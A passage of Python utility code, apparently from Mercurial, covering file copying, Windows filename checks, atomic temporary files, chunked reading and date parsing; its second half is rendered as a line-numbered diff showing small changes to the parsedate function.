            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise

    return check

# a whitelist of known filesystems where hardlinks work reliably
_hardlinkfswhitelist = {
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}

def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't
        # needed for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
                if oldstat and oldstat.stat:
                    newstat = filestat.frompath(dest)
                    if newstat.isambig(oldstat):
                        # stat of copied file is ambiguous to original one
                        advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                        os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise Abort(str(inst))

def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible."""
    num = 0

    gettopic = lambda: hardlink and _('linking') or _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            def nprog(t, pos):
                if pos is not None:
                    return progress(t, pos + num)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    progress(topic, None)

    return hardlink, num

_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                return _("filename contains '%s', which is invalid "
                         "on Windows") % escapestr(c)
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t

if pycompat.osname == 'nt':
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

if safehasattr(time, "perf_counter"):
    timer = time.perf_counter

def makelock(info, pathname):
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
    os.write(ld, info)
    os.close(ld)

def readlock(pathname):
    try:
        return os.readlink(pathname)
    except OSError as why:
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    fp = posixfile(pathname)
    r = fp.read()
    fp.close()
    return r

def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        return os.fstat(fp.fileno())
    except AttributeError:
        return os.stat(fp.name)

# File system features

def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    s1 = os.lstat(path)
    d, b = os.path.split(path)
    b2 = b.upper()
    if b == b2:
        b2 = b.lower()
        if b == b2:
            return True # no evidence against case sensitivity
    p2 = os.path.join(d, b2)
    try:
        s2 = os.lstat(p2)
        if s2 == s1:
            return False
        return True
    except OSError:
        return True

try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False

class _re(object):
    def _checkre2(self):
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape

re = _re()

_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    seps.replace('\\','\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patch of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)

def getfstype(dirpath):
    '''Get the filesystem type name from a directory (best-effort)

    Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
    '''
    return getattr(osutil, 'getfstype', lambda x: None)(dirpath)

def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass

def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    return (path.endswith(pycompat.ossep)
            or pycompat.osaltsep and path.endswith(pycompat.osaltsep))

def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative of simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if needed.'''
    return path.split(pycompat.ossep)

def gui():
    '''Are we running in a GUI?'''
    if pycompat.sysplatform == 'darwin':
        if 'SSH_CONNECTION' in encoding.environ:
            # handle SSH access to a box where the user is logged in
            return False
        elif getattr(osutil, 'isgui', None):
            # check if a CoreGraphics session is available
            return osutil.isgui()
        else:
            # pure build; use a safe default
            return True
    else:
        return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")

def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        try: os.unlink(temp)
        except OSError: pass
        raise
    return temp

class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        stat = os.fstat(fp.fileno())
        return cls(stat)

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat.st_ctime == old.stat.st_ctime and
                    self.stat.st_mtime == old.stat.st_mtime)
        except AttributeError:
            pass
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime  < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime  < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime  > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime  > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more in
        the same second (= S[n-1].ctime), so comparison of timestamps is
        ambiguous.

        Base idea to avoid such ambiguity is "advance mtime 1 sec, if
        timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        changes caused by collisions between such mtimes.
1681 1681
1682 1682 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1683 1683 S[n].mtime", even if size of a file isn't changed.
1684 1684 """
1685 1685 try:
1686 1686 return (self.stat.st_ctime == old.stat.st_ctime)
1687 1687 except AttributeError:
1688 1688 return False
1689 1689
1690 1690 def avoidambig(self, path, old):
1691 1691 """Change file stat of specified path to avoid ambiguity
1692 1692
1693 1693 'old' should be previous filestat of 'path'.
1694 1694
1695 1695 This skips avoiding ambiguity, if a process doesn't have
1696 1696 appropriate privileges for 'path'. This returns False in this
1697 1697 case.
1698 1698
1699 1699 Otherwise, this returns True, as "ambiguity is avoided".
1700 1700 """
1701 1701 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1702 1702 try:
1703 1703 os.utime(path, (advanced, advanced))
1704 1704 except OSError as inst:
1705 1705 if inst.errno == errno.EPERM:
1706 1706 # utime() on the file created by another user causes EPERM,
1707 1707 # if a process doesn't have appropriate privileges
1708 1708 return False
1709 1709 raise
1710 1710 return True
1711 1711
1712 1712 def __ne__(self, other):
1713 1713 return not self == other
1714 1714
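# A minimal sketch of the calling pattern intended for the helpers
# above ('lockedpath' is a hypothetical file guarded by repo.lock or
# a similar lock; it is not part of this module):
#
#   old = filestat.frompath(lockedpath)
#   # ... rewrite lockedpath while holding the lock ...
#   new = filestat.frompath(lockedpath)
#   if new.isambig(old):
#       new.avoidambig(lockedpath, old)
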
1715 1715 class atomictempfile(object):
1716 1716 '''writable file object that atomically updates a file
1717 1717
1718 1718 All writes will go to a temporary copy of the original file. Call
1719 1719 close() when you are done writing, and atomictempfile will rename
1720 1720 the temporary copy to the original name, making the changes
1721 1721 visible. If the object is destroyed without being closed, all your
1722 1722 writes are discarded.
1723 1723
1724 1724 The checkambig argument of the constructor is used with filestat,
1725 1725 and is useful only if the target file is guarded by a lock
1726 1726 (e.g. repo.lock or repo.wlock).
1727 1727 '''
1728 1728 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1729 1729 self.__name = name # permanent name
1730 1730 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1731 1731 createmode=createmode)
1732 1732 self._fp = posixfile(self._tempname, mode)
1733 1733 self._checkambig = checkambig
1734 1734
1735 1735 # delegated methods
1736 1736 self.read = self._fp.read
1737 1737 self.write = self._fp.write
1738 1738 self.seek = self._fp.seek
1739 1739 self.tell = self._fp.tell
1740 1740 self.fileno = self._fp.fileno
1741 1741
1742 1742 def close(self):
1743 1743 if not self._fp.closed:
1744 1744 self._fp.close()
1745 1745 filename = localpath(self.__name)
1746 1746 oldstat = self._checkambig and filestat.frompath(filename)
1747 1747 if oldstat and oldstat.stat:
1748 1748 rename(self._tempname, filename)
1749 1749 newstat = filestat.frompath(filename)
1750 1750 if newstat.isambig(oldstat):
1751 1751 # stat of changed file is ambiguous to original one
1752 1752 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1753 1753 os.utime(filename, (advanced, advanced))
1754 1754 else:
1755 1755 rename(self._tempname, filename)
1756 1756
1757 1757 def discard(self):
1758 1758 if not self._fp.closed:
1759 1759 try:
1760 1760 os.unlink(self._tempname)
1761 1761 except OSError:
1762 1762 pass
1763 1763 self._fp.close()
1764 1764
1765 1765 def __del__(self):
1766 1766 if safehasattr(self, '_fp'): # constructor actually did something
1767 1767 self.discard()
1768 1768
1769 1769 def __enter__(self):
1770 1770 return self
1771 1771
1772 1772 def __exit__(self, exctype, excvalue, traceback):
1773 1773 if exctype is not None:
1774 1774 self.discard()
1775 1775 else:
1776 1776 self.close()
1777 1777
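# A minimal usage sketch ('somefile' is a hypothetical target path);
# the context manager protocol above makes the rename-or-discard
# decision automatic:
#
#   with atomictempfile('somefile', mode='wb') as fp:
#       fp.write(b'all or nothing')
#
# On a normal exit the temporary copy is renamed over 'somefile'; if
# the block raises, the copy is discarded and 'somefile' is untouched.
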
1778 1778 def unlinkpath(f, ignoremissing=False):
1779 1779 """unlink and remove the directory if it is empty"""
1780 1780 if ignoremissing:
1781 1781 tryunlink(f)
1782 1782 else:
1783 1783 unlink(f)
1784 1784 # try removing directories that might now be empty
1785 1785 try:
1786 1786 removedirs(os.path.dirname(f))
1787 1787 except OSError:
1788 1788 pass
1789 1789
1790 1790 def tryunlink(f):
1791 1791 """Attempt to remove a file, ignoring ENOENT errors."""
1792 1792 try:
1793 1793 unlink(f)
1794 1794 except OSError as e:
1795 1795 if e.errno != errno.ENOENT:
1796 1796 raise
1797 1797
1798 1798 def makedirs(name, mode=None, notindexed=False):
1799 1799 """recursive directory creation with parent mode inheritance
1800 1800
1801 1801 Newly created directories are marked as "not to be indexed by
1802 1802 the content indexing service", if ``notindexed`` is specified
1803 1803 for "write" mode access.
1804 1804 """
1805 1805 try:
1806 1806 makedir(name, notindexed)
1807 1807 except OSError as err:
1808 1808 if err.errno == errno.EEXIST:
1809 1809 return
1810 1810 if err.errno != errno.ENOENT or not name:
1811 1811 raise
1812 1812 parent = os.path.dirname(os.path.abspath(name))
1813 1813 if parent == name:
1814 1814 raise
1815 1815 makedirs(parent, mode, notindexed)
1816 1816 try:
1817 1817 makedir(name, notindexed)
1818 1818 except OSError as err:
1819 1819 # Catch EEXIST to handle races
1820 1820 if err.errno == errno.EEXIST:
1821 1821 return
1822 1822 raise
1823 1823 if mode is not None:
1824 1824 os.chmod(name, mode)
1825 1825
1826 1826 def readfile(path):
1827 1827 with open(path, 'rb') as fp:
1828 1828 return fp.read()
1829 1829
1830 1830 def writefile(path, text):
1831 1831 with open(path, 'wb') as fp:
1832 1832 fp.write(text)
1833 1833
1834 1834 def appendfile(path, text):
1835 1835 with open(path, 'ab') as fp:
1836 1836 fp.write(text)
1837 1837
1838 1838 class chunkbuffer(object):
1839 1839 """Allow arbitrary sized chunks of data to be efficiently read from an
1840 1840 iterator over chunks of arbitrary size."""
1841 1841
1842 1842 def __init__(self, in_iter):
1843 1843 """in_iter is the iterator that's iterating over the input chunks."""
1844 1844 def splitbig(chunks):
1845 1845 for chunk in chunks:
1846 1846 if len(chunk) > 2**20:
1847 1847 pos = 0
1848 1848 while pos < len(chunk):
1849 1849 end = pos + 2 ** 18
1850 1850 yield chunk[pos:end]
1851 1851 pos = end
1852 1852 else:
1853 1853 yield chunk
1854 1854 self.iter = splitbig(in_iter)
1855 1855 self._queue = collections.deque()
1856 1856 self._chunkoffset = 0
1857 1857
1858 1858 def read(self, l=None):
1859 1859 """Read L bytes of data from the iterator of chunks of data.
1860 1860 Returns less than L bytes if the iterator runs dry.
1861 1861
1862 1862 If the size parameter is omitted, read everything"""
1863 1863 if l is None:
1864 1864 return ''.join(self.iter)
1865 1865
1866 1866 left = l
1867 1867 buf = []
1868 1868 queue = self._queue
1869 1869 while left > 0:
1870 1870 # refill the queue
1871 1871 if not queue:
1872 1872 target = 2**18
1873 1873 for chunk in self.iter:
1874 1874 queue.append(chunk)
1875 1875 target -= len(chunk)
1876 1876 if target <= 0:
1877 1877 break
1878 1878 if not queue:
1879 1879 break
1880 1880
1881 1881 # The easy way to do this would be to queue.popleft(), modify the
1882 1882 # chunk (if necessary), then queue.appendleft(). However, for cases
1883 1883 # where we read partial chunk content, this incurs 2 dequeue
1884 1884 # mutations and creates a new str for the remaining chunk in the
1885 1885 # queue. Our code below avoids this overhead.
1886 1886
1887 1887 chunk = queue[0]
1888 1888 chunkl = len(chunk)
1889 1889 offset = self._chunkoffset
1890 1890
1891 1891 # Use full chunk.
1892 1892 if offset == 0 and left >= chunkl:
1893 1893 left -= chunkl
1894 1894 queue.popleft()
1895 1895 buf.append(chunk)
1896 1896 # self._chunkoffset remains at 0.
1897 1897 continue
1898 1898
1899 1899 chunkremaining = chunkl - offset
1900 1900
1901 1901 # Use all of unconsumed part of chunk.
1902 1902 if left >= chunkremaining:
1903 1903 left -= chunkremaining
1904 1904 queue.popleft()
1905 1905 # offset == 0 is enabled by block above, so this won't merely
1906 1906 # copy via ``chunk[0:]``.
1907 1907 buf.append(chunk[offset:])
1908 1908 self._chunkoffset = 0
1909 1909
1910 1910 # Partial chunk needed.
1911 1911 else:
1912 1912 buf.append(chunk[offset:offset + left])
1913 1913 self._chunkoffset += left
1914 1914 left -= chunkremaining
1915 1915
1916 1916 return ''.join(buf)
1917 1917
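# An illustrative sketch of how chunkbuffer re-slices its input; the
# chunk values are arbitrary:
#
#   >>> buf = chunkbuffer(iter([b'abc', b'defg', b'h']))
#   >>> buf.read(5)
#   'abcde'
#   >>> buf.read(5)
#   'fgh'
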
1918 1918 def filechunkiter(f, size=131072, limit=None):
1919 1919 """Create a generator that produces the data in the file size
1920 1920 (default 131072) bytes at a time, up to optional limit (default is
1921 1921 to read all data). Chunks may be less than size bytes if the
1922 1922 chunk is the last chunk in the file, or the file is a socket or
1923 1923 some other type of file that sometimes reads less data than is
1924 1924 requested."""
1925 1925 assert size >= 0
1926 1926 assert limit is None or limit >= 0
1927 1927 while True:
1928 1928 if limit is None:
1929 1929 nbytes = size
1930 1930 else:
1931 1931 nbytes = min(limit, size)
1932 1932 s = nbytes and f.read(nbytes)
1933 1933 if not s:
1934 1934 break
1935 1935 if limit:
1936 1936 limit -= len(s)
1937 1937 yield s
1938 1938
1939 1939 def makedate(timestamp=None):
1940 1940 '''Return a unix timestamp (or the current time) as a (unixtime,
1941 1941 offset) tuple based on the local timezone.'''
1942 1942 if timestamp is None:
1943 1943 timestamp = time.time()
1944 1944 if timestamp < 0:
1945 1945 hint = _("check your clock")
1946 1946 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1947 1947 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1948 1948 datetime.datetime.fromtimestamp(timestamp))
1949 1949 tz = delta.days * 86400 + delta.seconds
1950 1950 return timestamp, tz
1951 1951
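# For example, in a process running at UTC+2 the computed offset is
# -7200 (seconds west of UTC are positive), which datestr() below
# renders as '+0200':
#
#   >>> datestr((0, -7200))
#   'Thu Jan 01 02:00:00 1970 +0200'
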
1952 1952 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1953 1953 """represent a (unixtime, offset) tuple as a localized time.
1954 1954 unixtime is seconds since the epoch, and offset is the time zone's
1955 1955 number of seconds away from UTC.
1956 1956
1957 1957 >>> datestr((0, 0))
1958 1958 'Thu Jan 01 00:00:00 1970 +0000'
1959 1959 >>> datestr((42, 0))
1960 1960 'Thu Jan 01 00:00:42 1970 +0000'
1961 1961 >>> datestr((-42, 0))
1962 1962 'Wed Dec 31 23:59:18 1969 +0000'
1963 1963 >>> datestr((0x7fffffff, 0))
1964 1964 'Tue Jan 19 03:14:07 2038 +0000'
1965 1965 >>> datestr((-0x80000000, 0))
1966 1966 'Fri Dec 13 20:45:52 1901 +0000'
1967 1967 """
1968 1968 t, tz = date or makedate()
1969 1969 if "%1" in format or "%2" in format or "%z" in format:
1970 1970 sign = (tz > 0) and "-" or "+"
1971 1971 minutes = abs(tz) // 60
1972 1972 q, r = divmod(minutes, 60)
1973 1973 format = format.replace("%z", "%1%2")
1974 1974 format = format.replace("%1", "%c%02d" % (sign, q))
1975 1975 format = format.replace("%2", "%02d" % r)
1976 1976 d = t - tz
1977 1977 if d > 0x7fffffff:
1978 1978 d = 0x7fffffff
1979 1979 elif d < -0x80000000:
1980 1980 d = -0x80000000
1981 1981 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1982 1982 # because they use the gmtime() system call which is buggy on Windows
1983 1983 # for negative values.
1984 1984 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1985 1985 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1986 1986 return s
1987 1987
1988 1988 def shortdate(date=None):
1989 1989 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1990 1990 return datestr(date, format='%Y-%m-%d')
1991 1991
1992 1992 def parsetimezone(s):
1993 1993 """find a trailing timezone, if any, in string, and return a
1994 1994 (offset, remainder) pair"""
1995 1995
1996 1996 if s.endswith("GMT") or s.endswith("UTC"):
1997 1997 return 0, s[:-3].rstrip()
1998 1998
1999 1999 # Unix-style timezones [+-]hhmm
2000 2000 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2001 2001 sign = (s[-5] == "+") and 1 or -1
2002 2002 hours = int(s[-4:-2])
2003 2003 minutes = int(s[-2:])
2004 2004 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2005 2005
2006 2006 # ISO8601 trailing Z
2007 2007 if s.endswith("Z") and s[-2:-1].isdigit():
2008 2008 return 0, s[:-1]
2009 2009
2010 2010 # ISO8601-style [+-]hh:mm
2011 2011 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2012 2012 s[-5:-3].isdigit() and s[-2:].isdigit()):
2013 2013 sign = (s[-6] == "+") and 1 or -1
2014 2014 hours = int(s[-5:-3])
2015 2015 minutes = int(s[-2:])
2016 2016 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2017 2017
2018 2018 return None, s
2019 2019
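# A few illustrative cases for the formats recognized above:
#
#   >>> parsetimezone(b'2006 +0200')
#   (-7200, '2006')
#   >>> parsetimezone(b'2006 UTC')
#   (0, '2006')
#   >>> parsetimezone(b'2006-08-10T12:00:00Z')
#   (0, '2006-08-10T12:00:00')
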
2020 2020 def strdate(string, format, defaults=None):
2021 2021 """parse a localized time string and return a (unixtime, offset) tuple.
2022 2022 If the string cannot be parsed, ValueError is raised."""
2023 2023 if defaults is None:
2024 2024 defaults = {}
2025 2025
2026 2026 # NOTE: unixtime = localunixtime + offset
2027 2027 offset, date = parsetimezone(string)
2028 2028
2029 2029 # add missing elements from defaults
2030 2030 usenow = False # default to using biased defaults
2031 2031 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2032 2032 part = pycompat.bytestr(part)
2033 2033 found = [True for p in part if ("%"+p) in format]
2034 2034 if not found:
2035 2035 date += "@" + defaults[part][usenow]
2036 2036 format += "@%" + part[0]
2037 2037 else:
2038 2038 # We've found a specific time element, less specific time
2039 2039 # elements are relative to today
2040 2040 usenow = True
2041 2041
2042 2042 timetuple = time.strptime(encoding.strfromlocal(date),
2043 2043 encoding.strfromlocal(format))
2044 2044 localunixtime = int(calendar.timegm(timetuple))
2045 2045 if offset is None:
2046 2046 # local timezone
2047 2047 unixtime = int(time.mktime(timetuple))
2048 2048 offset = unixtime - localunixtime
2049 2049 else:
2050 2050 unixtime = localunixtime + offset
2051 2051 return unixtime, offset
2052 2052
2053 2053 def parsedate(date, formats=None, bias=None):
2054 2054 """parse a localized date/time and return a (unixtime, offset) tuple.
2055 2055
2056 2056 The date may be a "unixtime offset" string or in one of the specified
2057 2057 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2058 2058
2059 >>> parsedate(b' today ') == parsedate(\
2060 datetime.date.today().strftime('%b %d'))
2059 >>> parsedate(b' today ') == parsedate(
2060 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2061 2061 True
2062 >>> parsedate(b'yesterday ') == parsedate((datetime.date.today() -\
2063 datetime.timedelta(days=1)\
2064 ).strftime('%b %d'))
2062 >>> parsedate(b'yesterday ') == parsedate(
2063 ... (datetime.date.today() - datetime.timedelta(days=1)
2064 ... ).strftime('%b %d').encode('ascii'))
2065 2065 True
2066 2066 >>> now, tz = makedate()
2067 2067 >>> strnow, strtz = parsedate(b'now')
2068 2068 >>> (strnow - now) < 1
2069 2069 True
2070 2070 >>> tz == strtz
2071 2071 True
2072 2072 """
2073 2073 if bias is None:
2074 2074 bias = {}
2075 2075 if not date:
2076 2076 return 0, 0
2077 2077 if isinstance(date, tuple) and len(date) == 2:
2078 2078 return date
2079 2079 if not formats:
2080 2080 formats = defaultdateformats
2081 2081 date = date.strip()
2082 2082
2083 2083 if date == 'now' or date == _('now'):
2084 2084 return makedate()
2085 2085 if date == 'today' or date == _('today'):
2086 date = datetime.date.today().strftime('%b %d')
2086 date = datetime.date.today().strftime(r'%b %d')
2087 date = encoding.strtolocal(date)
2087 2088 elif date == 'yesterday' or date == _('yesterday'):
2088 2089 date = (datetime.date.today() -
2089 datetime.timedelta(days=1)).strftime('%b %d')
2090 datetime.timedelta(days=1)).strftime(r'%b %d')
2091 date = encoding.strtolocal(date)
2090 2092
2091 2093 try:
2092 2094 when, offset = map(int, date.split(' '))
2093 2095 except ValueError:
2094 2096 # fill out defaults
2095 2097 now = makedate()
2096 2098 defaults = {}
2097 2099 for part in ("d", "mb", "yY", "HI", "M", "S"):
2098 2100 # this piece is for rounding the specific end of unknowns
2099 2101 b = bias.get(part)
2100 2102 if b is None:
2101 2103 if part[0:1] in "HMS":
2102 2104 b = "00"
2103 2105 else:
2104 2106 b = "0"
2105 2107
2106 2108 # this piece is for matching the generic end to today's date
2107 2109 n = datestr(now, "%" + part[0:1])
2108 2110
2109 2111 defaults[part] = (b, n)
2110 2112
2111 2113 for format in formats:
2112 2114 try:
2113 2115 when, offset = strdate(date, format, defaults)
2114 2116 except (ValueError, OverflowError):
2115 2117 pass
2116 2118 else:
2117 2119 break
2118 2120 else:
2119 2121 raise error.ParseError(_('invalid date: %r') % date)
2120 2122 # validate explicit (probably user-specified) date and
2121 2123 # time zone offset. values must fit in signed 32 bits for
2122 2124 # current 32-bit linux runtimes. timezones go from UTC-12
2123 2125 # to UTC+14
